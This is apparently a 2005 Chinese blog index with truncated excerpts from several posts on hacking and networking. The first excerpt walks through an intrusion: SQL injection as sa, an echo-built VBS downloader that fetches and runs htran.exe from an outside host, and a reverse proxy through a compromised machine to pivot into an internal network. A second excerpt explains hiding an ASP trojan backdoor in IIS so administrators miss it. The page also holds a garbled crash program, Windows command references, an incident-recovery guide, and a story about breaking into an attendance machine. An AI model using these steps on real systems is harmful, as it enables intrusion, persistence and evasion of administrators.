博文
妙用代理渗透内网(2005-06-29 20:22:00)
摘要:正文
代理在入侵里的作用-----妙用代理,渗透内网
一、踩点
主机: http://www.baidu.com/
OS:Windows 2000 + IIS 5.0 + MSSQL
端口:80 21
数据库放内网,IP为 192.168.1.2 ,更重要的是内网数据库可以上网.
首页存在注入漏洞,sa登陆.
注入点:
http://www.baidu.com/list.asp?id=1
二、入侵思路
1.给内网目标机装个代理服务器
2.把弄好的那个代理端口映到公网.
3.本机用sockscap连接公网映的那个端口,这样,自己也就进到了内网。
4.接下来就是找共享,嗅探,社会工程学等等了。
三、入侵准备
1.公网肉鸡一只:218.3.1.1
2.工具:htran2.4,SocksCap,扫描器一份,NBSI 2.0一份。
3.A表示数据库主机,B表示公网肉鸡 C表示网站放Web的地方 D表示本机(也在内网)
4.A:192.168.1.2 B:218.3.1.1 C:www.baidu.com D:192.168.0.25
四、入侵进行时
1.工具上传:
在nbsi下执行:
echo Set x= CreateObject(^"Microsoft.XMLHTTP^"):x.Open ^"GET^",LCase(WScript.Arguments(0)),0:x.Send():Set s = CreateObject(^"ADODB.Stream^"):s.Mode = 3:s.Type = 1:s.Open():s.Write(x.responseBody):s.SaveToFile LCase(WScript.Arguments(1)),2 >down.vbs
然后下载工具:
cscript down.vbs http://IP/htran.exe htran.exe //到我的空间下载htran.exe
2.安装Socks5服务
在nbsi下执行:
htran.exe -install //安装Socks5服务
htran.exe -start //启动Socks5服务
3.反弹进行时
在B上运行: htran.exe -s -listen 520 5200 //监听端口
在nbsi下执行:h......
建造永不被杀的80端口后门(www.hacker.com.cn 黑客防线)(2005-06-29 20:12:00)
摘要:www.hacker.com.cn 黑客防线
参考LCX在X档案发表过永远不被杀的的后门,自己就实验起来,只要把ASP木马放到其中一个站点中某个深的目录中,再在Internet 服务管理器面中选着这个站点(比如默认管理站点)打开修改属性->主目录中,把“应用程序保护”中改为"低",再在"写入""前面打上钩,在浏览器中输入ASP木马路径,输入密码以后进入管理页面,运行CMD命令还可以加用户之类的果然是管理员权限,呵呵用后发觉还不错,自觉以为就不错,而且上传文件都是在WEB进程上来着,而且还有系统权限,还觉得这样建立肉鸡相对来说比较安全就走了,后来想不到不过几天这个后门过几就没了,浏览上去什么都连ASP木马都没了,到底怎么回事?而且对方还搞了防火墙,只开21,80端口,眼汪汪丢去真可惜,看来管理员是察觉到了。看着我想有两个可能,一是ASP木马被杀,被管理员查到ASP木马就删了,二是那个可能管理员看到这个站点的属性改了就XXX~~~~,你也许会说用站点属性修改过的可以“写入”来写个木马上去,可是错了,管理员把默认管理站点都删了,或者者做其他修改了,昏,本来好好的后门却成了比较明显的暴露给管理员看了,而且最新的ASP也被会杀毒,看来个ASP看来这种方法也是不太隐蔽,还需要改进,突然想到可以通过后来参考建立隐藏主页,而且是虚拟目录可以设置“应用程序保护”为低的,其他站点中的目录属性是不可以设置这样的属性的,这样就不会暴露Internet 服务管理器中任何修改的迹象了,(对于一般的管理员来说,对于BT的我就不敢说了),OK我们来第一步
建立个隐藏虚拟主页(同时也可以做主页一举两得)
一般情况下,如果在肉鸡上开主页的话,只要管理员查看一下iis管理器程序,就会发现我们的主页,这样不但我们的主页暴露了,还可能会被管理员把我们给踢出去。而今天我教大家的方法是让管理员在iis管理器里发现不了方法。首先打开肉机(本例中以自己的机器为例)iis管理器,选定一个文件夹,然后点击右键,选择“资源管理器”,到网站的根目录下新建一个文件夹kiss,然后到system32上新建一个文件夹,我这里取名为myhome(这个文件夹尽量隐蔽的目录深一些,才不会被管理员发现),回到iis管理器按f5刷新就会看到kiss这个目录,选中它后,点击右......
常用网络命令及命令实例详解(四)(2005-06-29 19:30:00)
摘要: routing ip ospf add/delete/set/show interface 在指定接口上添加、删除、配置或显示 OSPF。
routing ip ospf add/delete/set/show area 添加、删除、配置或显示 OSPF 区域。
routing ip ospf add/delete/show range 在指定的 OSPF 区域上添加、删除、配置或显示范围。
routing ip ospf add/delete/set/show virtif 添加、删除、配置或显示 OSPF 虚拟接口。
routing ip ospf add/delete/show neighbor 添加、删除、配置或显示 OSPF 邻居。
routing ip ospf add/delete/show protofilter 添加、删除、配置或显示 OSPF 外部路由的路由信息源。
routing ip ospf add/delete/show routefilter 添加、删除、配置或显示 OSPF 外部路由的路由筛选。
routing ip ospf show areastats 显示 OSPF 区域统计。
routing ip ospf show lsdb 显示 OSPF 链接状态数据库。
routing ip ospf show virtifstats 显示 OSPF 虚拟链接统计。
routing ip relay set global 配置“DHCP 中继代理程序”的全局设置。
routing ip relay add/delete/set interface 在指定接口上添加、删除或配置“DHCP 中继代理程序”设置。
routing ip relay add/delete dhcpserver 在 DHCP 服务器地址列表中添加或删除 DHCP 服务器的 IP 地址。
routing ip relay show ifbinding 显示接口的 IP 地址绑定。
routing ip relay show ifconfig 显示每个接口的“DHCP 中继代理程序”配置。
routing ip relay show ifstats 显示每个接口的 DHCP 统......
常用网络命令及命令实例详解(三)(2005-06-29 19:29:00)
摘要:有关 runas 命令的使用范例,请参阅“相关主题”。
尽管 runas 通常由 Administrator 帐户使用,但并非仅限于 Administrator 帐户。任何拥有多个帐户的用户均可以利用备用凭据,使用 runas 运行程序、MMC 控制台或“控制面板”项。
如果要在计算机上使用 Administrator 帐户,对于 /user:,键入下列参数之一:
/user:AdministratorAccountName@ComputerName
/user:ComputerName\AdministratorAccountName
如果想以域管理员身份使用这个命令,键入下列参数之一:
/user:AdministratorAccountName@DomainName
/useromainName\AdministratorAccountName
runas 命令允许您运行程序 (*.exe)、保存的 MMC 控制台 (*.msc)、程序和保存的 MMC 控制台的快捷方式及“控制面板”项。作为另一组(例如“Users”或“Power Users”组)的成员登录到计算机时,可以以管理员的身份运行。
可以使用 runas 命令来启动任何程序、MMC 控制器或“控制面板”项。只要提供适当的用户帐户和密码信息,用户帐户就具有登录到计算机的能力,并且程序、MMC 控制台、“控制面板”项在系统中及对该用户帐户均可用.
runas 命令允许您管理其他域的服务器(运行工具的计算机和要管理的服务器在不同的域中)。
如果尝试使用 runas 从网络位置启动程序、MMC 控制台或“控制面板”项,可能会因为用来连接网络共享的凭据与用来启动程序的凭据不同而失败。后者的凭据可能无法访问同一网络共享。
有些项,例如“打印机”文件夹和桌面项,间接由 Windows 2000 打开,而不能使用 runas 命令启动。
如果 runas 命令失败,则可能是没有运行 RunAs 服务或使用的用户帐户无效。要检查 RunAs 服务的状态,请在“计算机管理”中单击“服务和应用程序”,然后单击“服务”。要测试用户帐户,请尝试使用该帐户登录合适的域。
范例
要在本地计算机上以管理员身份启动 Windows 2000 命......
常用网络命令及命令实例详解(二)(2005-06-29 19:29:00)
摘要:rsh 命令将标准输入复制到远程 command,将远程 command 的标准输出复制到其标准输出,将远程 command 的标准错误复制到其标准错误。Rsh 通常在远程命令终止时终止。
使用重定向符号
为了使重定向在远程计算机上发生,要以引号引住重定向符号(例如 ">>")。如果不使用引号,重定向会在本地计算机发生。例如,以下命令将远程文件“RemoteFile”附加到本地文件“LocalFile”中:
rsh othercomputer cat remotefile >> localfile
以下命令将远程文件 Remotefile 附加到远程文件 otherremotefile 中:
rsh othercomputer cat remotefile ">>" otherremotefile
使用 rsh
在使用已登录到某个域并且运行 Windows XP Professional 的计算机时,该域的主域控制器必须可用于确认用户名或 rsh 命令失败。
.rhosts 文件
.rhosts 文件通常许可 UNIX 系统的网络访问权限。.rhosts 文件列出可以访问远程计算机的计算机名及关联的登录名。在正确配置了 .rhosts 文件的远程计算机上运行 rcp、rexec 或 rsh 命令时,您不必提供远程计算机的登录和密码信息。
.rhosts 文件是一个文本文件,该文件中每一行为一个条目。条目由本地计算机名、本地用户名和有关该条目的所有注释组成。每个条目均由制表符或空格分开,注释用符号 (#) 打头。例如:
host7 #This computer is in room 31A
.rhosts 文件必须在远程计算机的用户主目录中。有关远程计算机 .rhosts 文件特定执行的详细信息,请参阅远程系统的文档。
只有当网际协议 (TCP/IP) 协议在 网络连接中安装为网络适配器属性的组件时,该命令才可用。
范例
要以名称 admin1 在远程计算机 vax1 上执行 telcon 命令,请键入:
rsh vax1 -l admin1 telcon
Tftp
向运行平凡文件传输协......
常用网络命令及命令实例详解(一)(2005-06-29 19:28:00)
摘要:1.最基本,最常用的,测试物理网络的 PING
ping 192.168.0.8 -t ,参数-t是等待用户去中断测试
2.查看DNS、IP、Mac等
A.Win98:winipcfg
B.Win2000以上:Ipconfig/all
C.NSLOOKUP:如查看河北的DNS
C:\>nslookup
Default Server: ns.hesjptt.net.cn
Address: 202.99.160.68
>server 202.99.41.2 则将DNS改为了41.2
> pop.pcpop.com
Server: ns.hesjptt.net.cn
Address: 202.99.160.68
Non-authoritative answer:
Name: pop.pcpop.com
Address: 202.99.160.212
3.网络信使 (经常有人问的~)
Net send 计算机名/IP * (广播) 传送内容,注意不能跨网段
net stop messenger 停止信使服务,也可以在面板-服务修改
net start messenger 开始信使服务
4.探测对方对方计算机名,所在的组、域及当前用户名 (追捕的工作原理)
ping -a IP -t ,只显示NetBios名
nbtstat -a 192.168.10.146 比较全的
5.netstat -a 显示出你的计算机当前所开放的所有端口
netstat -s -e 比较详细的显示你的网络资料,包括TCP、UDP、ICMP 和 IP的统计等
6.探测arp绑定(动态和静态)列表,显示所有连接了我的计算机,显示对方IP和MAC地址
arp -a
7.在代理服务器端
捆绑IP和MAC地址,解决局域网内盗用IP!:
ARP -s 192.168.10.59 00 -50-ff-6c-08-75
解除网卡的IP与MAC地址的绑定:
arp -d 网卡IP
8.在网络邻居上隐藏你的计算机 (让人家看不见你!)
net config server /hidden:yes
ne......
关于9行代码导致系统崩溃的分析整理(原作者: 不详)(2005-06-29 19:20:00)
摘要:目前很多地方都转载着利用9行代码史windows崩溃的文章,不过我发现没有关于为什么会使windows崩溃的分析。我先把原文给大家看看。然后把具体的细节说一下。
微软一直声称Windows XP多么多么稳定可靠,但日前一位名为Masaru Tsuchiyama的外国编程爱好者刊出了一小段C语言代码。这一只有9行的小程序如果在Windows XP/2000下运行,则可导致系统完全崩溃,并重新启动。但此程序对其他版本的Windows没有任何影响。这一产生无限循环输出的小程序的代码如下:
#include
int main( void )
{
for(;{
printf( "hung up\t\t\b\b\b\b\b\b" );
print("hung up\t\t\b\b\b\b\b\b";
}
return 0;
}
如果去掉Print语句,此程序还会导致NT 4.0系统出现蓝屏错误。
但愿微软赶快修补这一漏洞。同时提醒大家,此代码只可用于研究,不得用于任何非法勾当。
如果去掉Print语句,此程序还会导致NT 4.0系统出现蓝屏错误。
以上遍上网上纷纷转载的原文。
关于为什么会导致错误,就在看下面的分析吧。
\b是退格
代码是用退格符把console里的光标退成null,
然后显示任一字符(除\t),即崩溃.
但是一般情况\b是不能退出规定的区域的,
而如\b的前一个字符是\t则可以退出规定的区域(bug?).
双击运行时,系统将新建一个console,所以我们的显示在console
的左上角,我们只需两个\b就可退出屏幕(第一个吃掉\t).
原因是win32子系统意外中止导致系统崩溃.smss是windows系统建立的第一个用户进程,他的工作之一是建立csrss和winlogon进程,然后一直等待这两个进程的句柄,如果这两个进程意外中止,
smss将导致系统崩溃.csrss进程就是专门负责所有win32进程和系统进行通信的进程.所有win32进程的系统调用都会由csrss帮你完成,但是这样做因为需要进程切换所以效率太低.所以在windowsNT从3.51升级到4.0时将许多部分从用户态移入内核态,win32进程的系统调用将直接进行以减......
被入侵计算机系统恢复指南(2005-06-29 19:18:00)
摘要:A.准备工作
1.商讨安全策略
如果你的组织没有自己的安全策略,那么需要按照以下步骤建立自己的安全策略。
1.1.和管理人员协商
将入侵事故通知管理人员,可能在有的组织中很重要。在be aware进行事故恢复的时候,网络管理人员能够得到内部各部门的配合。也应该明白入侵可能引起传媒的注意。
1.2.和法律顾问协商
在开始你的恢复工作之前,你的组织需要决定是否进行法律调查。
注意CERT(Computer Emergency Response Team)只提供技术方面的帮助和提高网络主机对安全事件的反应速度。它们不会提出法律方面的建议。所以,对于法律方面的问题建议你咨询自己的法律顾问。你的法律顾问能够告诉你入侵者应该承担的法律责任(民事的或者是刑事的),以及有关的法律程序。
现在,是你决定如何处理这起事故的时候了,你可以加强自己系统的安全或者选择报警。
如果你想找出入侵者是谁,建议你与管理人员协商并咨询法律顾问,看看入侵者是否触犯了地方或者全国的法律。根据这些,你可以报案,看看警方是否愿意对此进行调查。
针对与入侵事件,你应该与管理人员和法律顾问讨论以下问题:
如果你要追踪入侵者或者跟踪网络连接,是否会触犯法律。
如果你的站点已经意识到入侵但是没有采取措施阻止,要承担什么法律责任。
入侵者是否触犯了全国或者本地的法律。
是否需要进行调查。
是否应该报警。
1.3.报警
通常,如果你想进行任何类型的调查或者起诉入侵者,最好先跟管理人员和法律顾问商量以下。然后通知有关执法机构。
一定要记住,除非执法部门的参与,否则你对入侵者进行的一切跟踪都可能是非法的。
1.4.知会其他有关人员
除了管理者和法律顾问之外,你还需要通知你的恢复工作可能影响到的人员,例如其他网络管理人员和用户。
2.记录恢复过程中所有的步骤
毫不夸张地讲,记录恢复过程中你采取的每一步措施,是非常重要的。恢复一个被侵入的系统是一件很麻烦的事,要耗费大量的时间,因此经常会使人作出一些草率的决定。记录自己所做的每一步可以帮助你避免作出草率的决定,还可以留作以后的参考。记录还可能对法律调查提供帮助。
A.准备工作
1.商讨安全策略 ......
2002年的第一场雪(一)(文/无心风雨)(2005-06-29 15:46:00)
摘要:那是2002年的美丽秋天,风与雪相识于江南某著名的网络实验室。风来自于计算机工程学院,雪来自电子工程学院,也许是背景的不同,更让人一见倾心。在别人的眼中,风是一个聪明才智明的男孩,雪是一个可爱的女孩,他们是很相配的一对,如果不是后来发生的事,风也会这么认为下去。
风曾经是黑客世界的一名神秘高手,更是一个热血青年,在漫长的大学生活中,风无数次将五星红旗和爱国主义标语贴在了自己攻破的国外主机上,也曾无数次与右翼的外国黑客交锋。在这一个过程中,风感到缺少了点什么,在大四那年,风放弃了到外资企业工作的机会,考取了这所大学网络实验室的研究生深造,在风心目中该实验室管理教育网的的一个主干节点,无疑代表了国内网络技术的最高水平。
然而理想与现实存在巨大的差距,激情短暂得一闪而逝,实验室的日子每天象白开水,很快就让风厌倦了,每天无休止的给老板写项目文档,遵循着jsp+ejb的固定开发模式,风开始怀疑来到这里的目的。在这个时候,雪走进了风的生活,也走进了风的心里。雪是一个很勤奋好学的女孩,几乎是实验室中最早来最迟走的学生,风并不是轻浮的人,但在与雪的几次交往中让风记住了这个叫雪的女孩,没有爱情就没有痛苦和快乐,没有理想就没有奋起的白开水般的生活,风要与它决裂了。风每个细胞都充满了战斗的激情,不惜付出一切要去追寻心中的洛水女神。为了能与雪相处得更多一些,哪怕还隔了几个工作隔间,风也愿意一改黑客特有的夜猫生活方式,将主要活动时间转到了实验室。
与雪的交往是淡淡的,纯同学式的,在雪的面前,一向热烈的风也终究没有将内心的感情表白。在一次又一次痛苦的内心矛盾中,风无意想到了一个奇异的方法。
实验室的研究生来自于计算机工程学院和电子工程学院!,再加上实验室的教师员工,人数多管理较难为此实验室设置了一部自己开发的考勤机。员工和研究生每天在实验事上下班事只需要拿考勤卡在考勤机前轻轻一晃,考勤机就会滴答一声,并在屏幕上显示出“某某,早上好”,“某某,请走好”的字样。该考勤机还可以数据连网,只需要通过浏览考勤机内部Web服务器,就能查询当月在实验室的考勤记录,很快的,风就查出了该嵌入试web服务器是基于2.4内核的裁剪过的Linux。风几乎不费力气就溢出并获得了该服务器的最高权限。
&......
网吧双线接入(ISP多链路复用)(2005-06-28 23:06:00)
摘要:多重ISP链路复用 Multipath Routing
hxgang
目的: 现在很多中小型网络有两条或者多条相同的不同的ISP的网络出口线路 而如何将这两条线路合理的利用起来 是很多人非常关心的,此文用通俗易懂的方法的讲解了如何初步达到此目的 本方案不需要大量的投资 也不需要改变现有网络结构 并且可扩展性好!
环境:用基于LINUX路由功能 由2.2内核开始,Linux便开始支持高级路由技术,提供策略路由,流量控制等多项高级路由功能,配合Netfilter包过滤软件,可实现许多专业路由器和防火墙才能实现的高级功能。 本方案采用RedHat 9.0 系统基础 系统自带 IPTABLES 和 IPROUTER2 软件,
申明:本方案为了表达一个通俗易懂的称述 很多地方采用大白话方式进行说明,这对技术来说是不严谨的态度,并且在文中可能出现很多错误,欢迎指正 希望有更多人能使用此方案而达到自己的目的 可以用在论坛上联系 或者Mail to :hxgang@hotmail.com
约定:对于具体#作,都是基于Shell下的,就是所谓终端,控制台等,我将用横线阁开,可以看成实际的#作,后面的针对解释 均采用汉字通俗解释 但不能作为实际#作!
一、 硬件选择和实施:
1。本人在实际#作中选择了 C3 1G CPU INTEL 815ET芯片组主板(集成显卡) 128M SDRAM 三张网卡 均是RTL 8139 10/100M 自适应网卡 3G大小心的一块老硬盘 RedHat 9.0系统盘 光驱 键盘 鼠标 显示器 为安装使用 过后拆掉,在各个实际环境里 选择方案不一定要相同 ,但是本人建议 CPU 不低于233M 内存不低于64M 网卡尽量不用8029等10M 设备,如果有条件可以选择不同的主流网卡 其他 主是要求稳定 !
2。安装系统 根据硬盘大小以及个人情况 可任意方式安装
提示以及建议: A : 如果分区不是很清楚 可以用 光盘上的PQ 将硬盘分区 第一次接触的,采用 将6G以下的空间分成EXT3格式的分区 然后接着一256M左右的SWP交换分区 B。 网卡先别一次性装上, 可先将要用于内网的网卡,先插上,以后系统安装成功以后再依次插上其他网卡 以免混淆!在安装的时候 可以完全默认的方式 并且 尽量采用 英文安装 ,不装XWINDOWS 也就是可以一路......